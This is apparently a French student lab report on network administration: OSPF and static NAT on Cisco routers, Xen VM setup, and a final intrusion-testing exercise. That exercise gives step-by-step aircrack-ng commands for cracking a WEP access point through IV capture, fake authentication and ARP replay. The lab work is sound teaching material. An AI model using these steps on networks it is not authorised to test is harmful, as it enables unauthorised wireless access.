TP sysres IMA5sc 2020/2021 G1
TP PRA - Evan Gury & Vincent Dubois - trompettedelamort
Informations générales
Groupe | Domaine | Distribution | VLAN privé | IP (VLAN333) | Netmask (VLAN333) | Gateway (VLAN333) | Gateway 6509-E (VLAN333) | Gateway 9200 (VLAN333) | IP (publique) |
---|---|---|---|---|---|---|---|---|---|
Groupe 1 | trompettedelamort.site | Debian 10 Buster | 301 | 100.64.0.28 | 255.255.255.0 | 100.64.0.254 | 100.64.0.1 | 100.64.0.2 | 193.48.57.188 |
Sommaire
Architecture réseau
Architecture générale
Réalisé par le groupe 4 et 14.
Les réseaux virtuels
Réalisé par le groupe 14... merci Guillaume
Interconnexion avec Internet (IPv4)
OSPF
L'OSPF permet aux routeurs dans un même domaine d'échanger des informations sur le réseau. Cela permet aux différents routeurs voisins d'avoir de meilleur tables de routages.
ip route 193.48.57.176 255.255.255.0 null0 #Ajout d'une route vers le routeur pour pouvoir ping directement à partir du routeur
router ospf 1 # un numéro de processus router-id 10.60.0.1 # un id pour le routeur (plus petite adresse disponible) log-adjacency-changes summary-address 193.48.57.176 255.255.255.240 # adresse que l'on souhaite diffuser aux voisins (addresse du VLAN 333) summary-address 100.60.0.0 255.240.0.0 not-advertise # address q'on veut pas diffuser (celle du reseau privé) summary-address 10.0.0.0 255.0.0.0 not-advertise # address q'on veut pas diffuser (?) redistribute connected subnets # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés redistribute static subnets network 192.168.222.8 0.0.0.7 area 2 # domaine de diffusion OSPF (Attention au masque inversé)
On peut vérifier le bon fonctonnement avec un ping vers l'adresse globale routeur de l'école
ping 193.48.57.48
De plus, on constate de nouvelles routes partagé par le routeur de l'école ("O" au début de la ligne)
show ip route
NAT
On cherche à réaliser une translation d'IP (NAT static) et non une mascarade (injection = NAT Dynamic)
ip nat inside source static network 100.64.0.16 193.48.57.176 /28
Cela permet d'associer les adresse non routées de 100.64.0.16 à 100.64.0.28 aux adresse routées de 193.48.57.176 à 193.48.57.188 Il faut ensuite indiquer ques sont les VLAN concernés par la translation:
int vlan 131 ip nat outside exit int vlan 333 ip nat inside exit
Installation de la machine virtuelle
- Création de la machine virtuelle
ssh capbreton.plil.info xen-create-image...
- Création des disques de stockage sur le serveur de virtualisation (pour tout les binômes):
- On riquisitionne les deux disques de 2,7To que l'on met dans un groupe
pvcreate /dev/sde pvcreate /dev/sdf vgcreate storage /dev/sde /dev/sdf
- On créer 2 partitions de 10Go pour chaque binôme:
lvcreate -L10G -n trompettedelamort1 storage lvcreate -L10G -n trompettedelamort2 storage
- Modification du fichier de config de la VM: /etc/xen/trompettedelamort.cfg
vif = ['bridge=IMA5sc, ip=100.64.0.16, ...']
- Lancer la VM
xl create -c /etc/xen/trompettedelamort.cfg
- Modification du fichier /etc/fstab pour monter les répertoires var et home sur les partitions crées. On ajoute:
/dev/xvda3 /home /ext4 default 0 2 /dev/xvda4 /var /ext4 default 0 2
Services Internet
Afin de mettre internet sur nos machines il faut au préalable modifier le fichier /etc/network/interfaces de nos VM:
# The loopback network interface auto lo iface lo inet loopback # The primary network interface auto eth0 iface eth0 inet static address 193.48.57.188 netmask 255.255.255.255 up ip address add dev eth0 100.64.0.28/24 up ip route add default via 100.64.0.2 src 193.48.57.188 down ip address del dev eth0 100.64.0.28/24 down ip route del default via 100.64.0.2 src 193.48.57.188
L'adresse 193.48.57.188 correspond à notre adressé routée, l'adresse 100.64.0.28 est notre adresse sur le vlan333 et l'adresse 100.64.0.2 est l'adresse du routeur/commutateur 9200 sur le vlan333.
Il faut ensuite ajouter la route sur le 9200 pour notre VM. Pour se faire on se connecte en ssh sur la zabeth09:
ssh pifou@zabet09.plil.info
Et ensuite via minicom:
minicom -os /dev/ttyACM0
On rentre la commande suivante (apres avoir fait enable et conf t au préalable):
ip route 193.48.57.188 255.255.255.255 100.64.0.28
Nous avons désormais accés à internet sur nos VM et nous pouvons donc maintenant installer bind9 et configurer notre DNS.
Tests d’intrusion
Cassage de clef WEP d’un point d’accès WiFi
Avec le packetage aircrack-ng il est possible de casser une clef wep.
Pour se faire on récupère le nom de de notre interface WiFi et son adresse MAC avec :
iwconfig
Ensuite pour analyser les packets WiFi qui circulent sur le réseau on se sert de la commande:
airodump-ng nomDeMaCarte
Se faisant, l'interface se met automatiquement en mode monitor.
Il faut ensuite tester le Point d'accés avec une injection test:
aireplay-ng -9 -e nomPA -a MACPA nomDeMaCarte
-9 permet de réaliser un test.
Pour casser la clef WEP, l'algorithme nécessite le plus de vecteur d'initialisation possible. Pour récupérer ces derniers on se sert de la commande suivante:
airodump-ng -c 3 --bssid MACPA -w output nomDeMaCarte
-c 3 correspond au canal sur lequel émet notre PA, et output sera le fichier contenant tous les vecteurs d'initialisations.
Pour accélérer l'acquisition de vecteurs d'initialisations,nous allons récupérer tous les paquets ARP émis par le PA et les réinjecter. A chaque réinjection les PA génère un nouveau vecteur d'initialisation, cette technique permet d'accélérer la collecte des vecteurs.
Pour permettre l'injection de paquet ARP dans le PA il faut d'abord associer la carte et le PA:
aireplay-ng 1 0 -e nomPA -a MACPA -h MACcarte nomDeMaCarte
-1 correspond à une fausse authentification et 0 au délais de réassociation.
Une fois que nous avons collecté suffisament de vecteurs nous pouvons lancer l'algorithme de cassage:
aircrack-ng -b MACPA output*.cap